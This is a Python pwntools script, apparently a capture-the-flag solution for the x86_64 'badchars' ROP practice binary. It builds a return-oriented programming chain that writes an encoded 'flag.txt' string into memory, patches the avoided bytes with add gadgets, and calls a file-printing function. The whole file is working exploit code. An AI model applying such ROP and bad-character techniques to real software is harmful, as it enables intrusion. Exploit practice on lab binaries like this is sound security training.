x86_64/badchars/exploit_dirty.py


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

#!/usr/bin/env python3
from pwn import *
from time import sleep

# gotta go FAST
# i'll make it clean when I'm not pressured for time


prog = process('./badchars')
payload = b''
for c in range(40):
    payload += b'a'

payload += p64(0x000000000040069c)  # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
payload += b'fl`f-twt'
payload += p64(0x601be0)
payload += p64(1)
payload += p64(0x601be2)

payload += p64(0x0000000000400634) # just pops

payload += p64(0x000000000040062c) # add [r15], r14

payload += p64(0x00000000004006a0) # pops
payload += p64(1)
payload += p64(0x601be3)


payload += p64(0x000000000040062c) # add [r15], r14

payload += p64(0x00000000004006a0) # pops
payload += p64(1)
payload += p64(0x601be4)
payload += p64(0x000000000040062c) # add [r15], r14


payload += p64(0x00000000004006a0) # pops
payload += p64(1)
payload += p64(0x601be6)
payload += p64(0x000000000040062c) # add [r15], r14


payload += p64(0x00000000004006a3) # pops rdi
payload += p64(0x601be0)

payload += p64(0x0000000000400510)


payload += b"\n"
prog.sendline(payload)

sleep(0.5)
print(prog.recv())
prog.close()